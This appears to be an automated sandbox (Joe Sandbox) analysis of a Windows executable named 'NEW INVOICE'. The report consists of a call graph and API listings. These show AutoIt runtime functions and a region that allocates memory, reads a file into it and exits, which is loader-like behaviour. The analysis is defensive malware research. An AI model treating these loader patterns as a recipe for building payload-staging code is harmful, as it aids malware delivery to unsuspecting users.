83513->83535 83514 409ed0 83518 42d50d 83514->83518 83573 409ef8 _memcpy_s ctype 83514->83573 83808 40b800 VariantClear VariantClear ctype 83514->83808 83516->83514 83517 41171a 75 API calls 83516->83517 83519 42d480 83517->83519 83522 42d527 83518->83522 83809 40b800 VariantClear VariantClear ctype 83518->83809 83521 42d491 83519->83521 83804 44b3f6 75 API calls 83519->83804 83805 40df50 75 API calls 83521->83805 83522->83573 83810 40e2e0 VariantClear ctype 83522->83810 83523 42d195 VariantClear 83523->83541 83525 40a415 83530 41171a 75 API calls 83525->83530 83526 42db5c 83815 4721e5 VariantClear 83526->83815 83527 4092c0 VariantClear 83527->83541 83549 40a41c 83530->83549 83533 41171a 75 API calls 83533->83541 83536 41171a 75 API calls 83535->83536 83536->83554 83537 42d4a6 83806 4530b3 75 API calls 83537->83806 83539 42db96 83816 45e62e 116 API calls 3 library calls 83539->83816 83541->83505 83541->83510 83541->83511 83541->83523 83541->83527 83541->83533 83541->83535 83543 42d128 83541->83543 83541->83544 83547 42d20c 83541->83547 83799 40c3e0 75 API calls 83541->83799 83800 40c620 118 API calls 83541->83800 83802 40be00 75 API calls 2 library calls 83541->83802 83803 40e380 VariantClear ctype 83541->83803 83546 4092c0 VariantClear 83543->83546 83829 45e62e 116 API calls 3 library calls 83544->83829 83545 42d4d7 83807 4530b3 75 API calls 83545->83807 83551 42d131 83546->83551 83547->83407 83561 40a481 83549->83561 83817 40c8a0 VariantClear ctype 83549->83817 83801 410ae0 VariantClear ctype 83551->83801 83797 401380 75 API calls 83554->83797 83557 402cc0 75 API calls 83557->83573 83558 40aa22 ctype 83558->83407 83559 4092c0 VariantClear 83566 40a534 _memcpy_s ctype 83559->83566 83560 411421 74 API calls __cinit 83560->83573 83562 40a4ed 83561->83562 83563 42dc1e VariantClear 83561->83563 83561->83566 83568 40a4ff ctype 83562->83568 83818 40e380 VariantClear ctype 83562->83818 83563->83568 83566->83559 83574 42deb6 VariantClear 83566->83574 83577 40e380 VariantClear 83566->83577 83578 40a73c 83566->83578 83580 42e237 83566->83580 83581 42dfe9 VariantClear 83566->83581 83582 42df47 VariantClear 83566->83582 83588 41171a 75 API calls 83566->83588 83591 41171a 75 API calls 83566->83591 83819 46e9cd 75 API calls 83566->83819 83820 409210 VariantClear 83566->83820 83821 44cc6c VariantClear ctype 83566->83821 83567 41171a 75 API calls 83567->83566 83568->83566 83568->83567 83572 44b3f6 75 API calls 83572->83573 83573->83526 83573->83539 83573->83554 83573->83557 83573->83560 83573->83572 83575 41171a 75 API calls 83573->83575 83576 40a053 83573->83576 83579 40a3a7 83573->83579 83811 45ee98 75 API calls 83573->83811 83812 4019e0 76 API calls 83573->83812 83813 404260 76 API calls 83573->83813 83814 409210 VariantClear 83573->83814 83574->83566 83575->83573 83576->83407 83577->83566 83578->83580 83585 40a76b 83578->83585 83579->83525 83579->83526 83822 46e709 VariantClear VariantClear ctype 83580->83822 83581->83566 83582->83566 83584 40a7a2 83597 40a7ad ctype 83584->83597 83823 40b800 VariantClear VariantClear ctype 83584->83823 83585->83584 83608 40a800 ctype 83585->83608 83796 40b800 VariantClear VariantClear ctype 83585->83796 83588->83566 83589 40a8b0 83600 40a8c2 ctype 83589->83600 83825 40e380 VariantClear ctype 83589->83825 83590 42e312 83592 42e337 VariantClear 83590->83592 83590->83600 83593 42dd10 VariantInit VariantCopy 83591->83593 83592->83600 83593->83566 83594 42dd30 VariantClear 83593->83594 83594->83566 83595 42e3b2 83603 42e3da VariantClear 83595->83603 83609 40a91a ctype 83595->83609 83598 40a7ee 83597->83598 83602 42e2a7 VariantClear 83597->83602 83597->83608 83598->83608 83824 40e380 VariantClear ctype 83598->83824 83600->83595 83601 40a908 83600->83601 83601->83609 83826 40e380 VariantClear ctype 83601->83826 83602->83608 83603->83609 83604 42e47f 83610 42e4a3 VariantClear 83604->83610 83614 40a957 ctype 83604->83614 83606 40a945 83606->83614 83827 40e380 VariantClear ctype 83606->83827 83608->83589 83608->83590 83609->83604 83609->83606 83610->83614 83612 42e559 VariantClear 83612->83614 83614->83558 83614->83612 83828 40e380 VariantClear ctype 83614->83828 83615->83371 83616->83402 83617->83402 83618->83402 83619->83402 83620->83402 83621->83402 83623 40412e 83622->83623 83624 4092c0 VariantClear 83623->83624 83625 404138 83624->83625 83625->83396 83626->83402 83627->83402 83628->83407 83629->83370 83630->83407 83631->83407 83632->83413 83633->83417 83634->83433 83635->83430 83636->83420 83637->83437 83638->83458 83639->83464 83640->83437 83641->83466 83642->83437 83643->83466 83644->83437 83645->83451 83646->83466 83647->83453 83648->83466 83649->83445 83650->83472 83652 4092c0 VariantClear 83651->83652 83653 40416e 83652->83653 83654 404120 VariantClear 83653->83654 83655 40419b 83654->83655 83661 40efe0 83655->83661 83669 4734b7 83655->83669 83656 4041c6 83656->83469 83656->83480 83659->83469 83660->83471 83662 40eff5 CreateFileW 83661->83662 83663 4299bf 83661->83663 83665 40f017 83662->83665 83664 4299c4 CreateFileW 83663->83664 83663->83665 83664->83665 83666 4299ea 83664->83666 83665->83656 83713 40e0d0 SetFilePointerEx SetFilePointerEx 83666->83713 83668 4299f5 83668->83665 83670 453063 111 API calls 83669->83670 83671 4734d7 83670->83671 83672 473545 83671->83672 83673 47350c 83671->83673 83714 463c42 83672->83714 83674 4092c0 VariantClear 83673->83674 83676 473514 83674->83676 83676->83656 83677 473558 83678 473595 83677->83678 83679 47355c 83677->83679 83680 473616 83678->83680 83684 453063 111 API calls 83678->83684 83694 473655 83678->83694 83773 462f5a 87 API calls __wcsicoll 83678->83773 83681 4092c0 VariantClear 83679->83681 83727 463d7e 83680->83727 83692 473564 83681->83692 83683 473622 83685 473697 83683->83685 83686 47362c 83683->83686 83684->83678 83761 457838 83685->83761 83688 4092c0 VariantClear 83686->83688 83691 473634 83688->83691 83691->83656 83692->83656 83696 4092c0 VariantClear 83694->83696 83708 47365d 83696->83708 83697 4736b0 83774 45e62e 116 API calls 3 library calls 83697->83774 83698 4736c9 83775 40e7e0 76 API calls 83698->83775 83701 4736ba GetCurrentProcess TerminateProcess 83701->83698 83702 4736db 83709 4736ff 83702->83709 83776 40d030 76 API calls 83702->83776 83703 473731 83710 473744 FreeLibrary 83703->83710 83711 47374b 83703->83711 83705 4736f1 83777 46b945 134 API calls 2 library calls 83705->83777 83708->83656 83709->83703 83778 40d030 76 API calls 83709->83778 83779 46b945 134 API calls 2 library calls 83709->83779 83710->83711 83711->83656 83713->83668 83780 45335b 76 API calls 83714->83780 83716 463c5d 83781 442c52 80 API calls _wcslen 83716->83781 83718 463c72 83720 40c060 75 API calls 83718->83720 83726 463cac 83718->83726 83721 463c8e 83720->83721 83782 4608ce 75 API calls _memcpy_s 83721->83782 83723 463ca4 83724 40c740 75 API calls 83723->83724 83724->83726 83725 463cf7 83725->83677 83726->83725 83783 462f5a 87 API calls __wcsicoll 83726->83783 83728 453063 111 API calls 83727->83728 83729 463d99 83728->83729 83730 463de0 83729->83730 83731 463dca 83729->83731 83785 40c760 78 API calls 83730->83785 83784 453081 111 API calls 83731->83784 83734 463dd0 LoadLibraryW 83736 463e09 83734->83736 83735 463de7 83740 463e19 83735->83740 83786 40c760 78 API calls 83735->83786 83738 463e3e 83736->83738 83736->83740 83741 463e4e 83738->83741 83742 463e7b 83738->83742 83739 463dfb 83739->83740 83787 40c760 78 API calls 83739->83787 83740->83683 83788 40d500 75 API calls 83741->83788 83790 40c760 78 API calls 83742->83790 83746 463e82 GetProcAddress 83750 463e90 83746->83750 83747 463e57 83789 45efe7 77 API calls ctype 83747->83789 83749 463e62 GetProcAddress 83752 463e79 83749->83752 83750->83740 83751 463edf 83750->83751 83750->83752 83751->83740 83755 463eef FreeLibrary 83751->83755 83752->83750 83791 403470 75 API calls _memcpy_s 83752->83791 83754 463eb4 83792 40d500 75 API calls 83754->83792 83755->83740 83757 463ebd 83793 45efe7 77 API calls ctype 83757->83793 83759 463ec8 GetProcAddress 83794 401330 ctype 83759->83794 83762 457a4c 83761->83762 83768 45785f _strcat _wcslen _wcscpy ctype 83761->83768 83769 410d40 83762->83769 83763 443576 78 API calls 83763->83768 83764 40c760 78 API calls 83764->83768 83765 453081 111 API calls 83765->83768 83766 4138ba 67 API calls _malloc 83766->83768 83767 40f580 77 API calls 83767->83768 83768->83762 83768->83763 83768->83764 83768->83765 83768->83766 83768->83767 83770 410d55 83769->83770 83771 410ded VirtualProtect 83770->83771 83772 410dbb 83770->83772 83771->83772 83772->83697 83772->83698 83773->83678 83774->83701 83775->83702 83776->83705 83777->83709 83778->83709 83779->83709 83780->83716 83781->83718 83782->83723 83783->83725 83784->83734 83785->83735 83786->83739 83787->83736 83788->83747 83789->83749 83790->83746 83791->83754 83792->83757 83793->83759 83794->83751 83795->83490 83796->83584 83797->83498 83798->83503 83799->83541 83800->83541 83801->83558 83802->83541 83803->83541 83804->83521 83805->83537 83806->83545 83807->83514 83808->83518 83809->83522 83810->83573 83811->83573 83812->83573 83813->83573 83814->83573 83815->83539 83816->83505 83817->83549 83818->83568 83819->83566 83820->83566 83821->83566 83822->83584 83823->83597 83824->83608 83825->83600 83826->83609 83827->83614 83828->83614 83829->83505 83830->83509 83831 42919b 83836 40ef10 83831->83836 83834 411421 __cinit 74 API calls 83835 4291aa 83834->83835 83837 41171a 75 API calls 83836->83837 83838 40ef17 83837->83838 83839 42ad48 83838->83839 83844 40ef40 74 API calls __cinit 83838->83844 83841 40ef2a 83845 40e470 83841->83845 83844->83841 83846 40c060 75 API calls 83845->83846 83847 40e483 GetVersionExW 83846->83847 83848 4021e0 75 API calls 83847->83848 83849 40e4bb 83848->83849 83871 40e600 83849->83871 83855 42accc 83857 42ad28 GetSystemInfo 83855->83857 83860 42ad38 GetSystemInfo 83857->83860 83858 40e557 GetCurrentProcess 83891 40ee30 LoadLibraryA GetProcAddress 83858->83891 83859 40e56c 83859->83860 83884 40eee0 83859->83884 83864 40e5c9 83888 40eea0 83864->83888 83867 40e5e0 83869 40e5f1 FreeLibrary 83867->83869 83870 40e5f4 83867->83870 83868 40e5dd FreeLibrary 83868->83867 83869->83870 83870->83834 83872 40e60b 83871->83872 83873 40c740 75 API calls 83872->83873 83874 40e4c2 83873->83874 83875 40e620 83874->83875 83876 40e62a 83875->83876 83877 42ac93 83876->83877 83878 40c740 75 API calls 83876->83878 83879 40e4ce 83878->83879 83879->83855 83880 40ee70 83879->83880 83881 40e551 83880->83881 83882 40ee76 LoadLibraryA 83880->83882 83881->83858 83881->83859 83882->83881 83883 40ee87 GetProcAddress 83882->83883 83883->83881 83885 40e5bf 83884->83885 83886 40eee6 LoadLibraryA 83884->83886 83885->83857 83885->83864 83886->83885 83887 40eef7 GetProcAddress 83886->83887 83887->83885 83892 40eec0 LoadLibraryA GetProcAddress 83888->83892 83890 40e5d3 GetNativeSystemInfo 83890->83867 83890->83868 83891->83859 83892->83890 83893 42e89e 83900 40c000 83893->83900 83895 42e8ac 83896 409a40 165 API calls 83895->83896 83897 42e8ca 83896->83897 83911 44b92e VariantClear 83897->83911 83899 42f3ae 83901 40c014 83900->83901 83902 40c007 83900->83902 83904 40c01a 83901->83904 83905 40c02c 83901->83905 83912 409210 VariantClear 83902->83912 83913 409210 VariantClear 83904->83913 83908 41171a 75 API calls 83905->83908 83906 40c00f 83906->83895 83910 40c033 83908->83910 83909 40c023 83909->83895 83910->83895 83911->83899 83912->83906 83913->83909 83914 3f73828 83915 3f71478 GetPEB 83914->83915 83916 3f738d5 83915->83916 83928 3f73718 83916->83928 83918 3f738fe CreateFileW 83920 3f73952 83918->83920 83924 3f7394d 83918->83924 83921 3f73969 VirtualAlloc 83920->83921 83920->83924 83922 3f73987 ReadFile 83921->83922 83921->83924 83923 3f739a2 83922->83923 83922->83924 83925 3f72718 13 API calls 83923->83925 83926 3f739d5 83925->83926 83927 3f739f8 ExitProcess 83926->83927 83927->83924 83929 3f73721 Sleep 83928->83929 83930 3f7372f 83929->83930
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00409A61
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                    • String ID: 0vH$4RH
                                                                                    • API String ID: 1143807570-2085553193
                                                                                    • Opcode ID: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                                    • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                    • Opcode Fuzzy Hash: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                                    • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1204 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1213 40e506-40e509 1204->1213 1214 42accc-42acd1 1204->1214 1217 40e540-40e555 call 40ee70 1213->1217 1218 40e50b-40e51c 1213->1218 1215 42acd3-42acdb 1214->1215 1216 42acdd-42ace0 1214->1216 1219 42ad12-42ad20 1215->1219 1220 42ace2-42aceb 1216->1220 1221 42aced-42acf0 1216->1221 1235 40e557-40e573 GetCurrentProcess call 40ee30 1217->1235 1236 40e579-40e5a8 1217->1236 1222 40e522-40e525 1218->1222 1223 42ac9b-42aca7 1218->1223 1234 42ad28-42ad2d GetSystemInfo 1219->1234 1220->1219 1221->1219 1225 42acf2-42ad06 1221->1225 1222->1217 1226 40e527-40e537 1222->1226 1228 42acb2-42acba 1223->1228 1229 42aca9-42acad 1223->1229 1230 42ad08-42ad0c 1225->1230 1231 42ad0e 1225->1231 1232 42acbf-42acc7 1226->1232 1233 40e53d 1226->1233 1228->1217 1229->1217 1230->1219 1231->1219 1232->1217 1233->1217 1237 42ad38-42ad3d GetSystemInfo 1234->1237 1235->1236 1245 40e575 1235->1245 1236->1237 1238 40e5ae-40e5c3 call 40eee0 1236->1238 1238->1234 1244 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1238->1244 1248 40e5e0-40e5ef 1244->1248 1249 40e5dd-40e5de FreeLibrary 1244->1249 1245->1236 1250 40e5f1-40e5f2 FreeLibrary 1248->1250 1251 40e5f4-40e5ff 1248->1251 1249->1248 1250->1251
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                    • String ID: pMH
                                                                                    • API String ID: 2923339712-2522892712
                                                                                    • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                    • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                    • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                    • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                                    • API String ID: 2574300362-3542929980
                                                                                    • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                    • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                    • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                    • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                    • __wsplitpath.LIBCMT ref: 00410C61
                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                    • _wcsncat.LIBCMT ref: 00410C78
                                                                                    • __wmakepath.LIBCMT ref: 00410C94
                                                                                      • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                    • _wcscpy.LIBCMT ref: 00410CCC
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                    • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                    • _wcscat.LIBCMT ref: 00429C43
                                                                                    • _wcslen.LIBCMT ref: 00429C55
                                                                                    • _wcslen.LIBCMT ref: 00429C66
                                                                                    • _wcscat.LIBCMT ref: 00429C80
                                                                                    • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                    • API String ID: 1004883554-2276155026
                                                                                    • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                    • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                    • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                    • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                    APIs
                                                                                      • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                      • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                    • timeGetTime.WINMM ref: 00409880
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                    • String ID:
                                                                                    • API String ID: 3219444185-0
                                                                                    • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                                    • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                    • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                                    • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                                    • String ID: FILE
                                                                                    • API String ID: 3888824918-3121273764
                                                                                    • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                    • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                    • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                    • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32 ref: 00410326
                                                                                    • RegisterClassExW.USER32 ref: 00410359
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                    • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                    • ImageList_ReplaceIcon.COMCTL32(00C1DE38,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                    • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                    • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                    • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                    • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                    • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                    • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                    • RegisterClassExW.USER32 ref: 004102C6
                                                                                      • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                      • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                      • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                      • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                      • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                      • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                      • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00C1DE38,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                    Strings
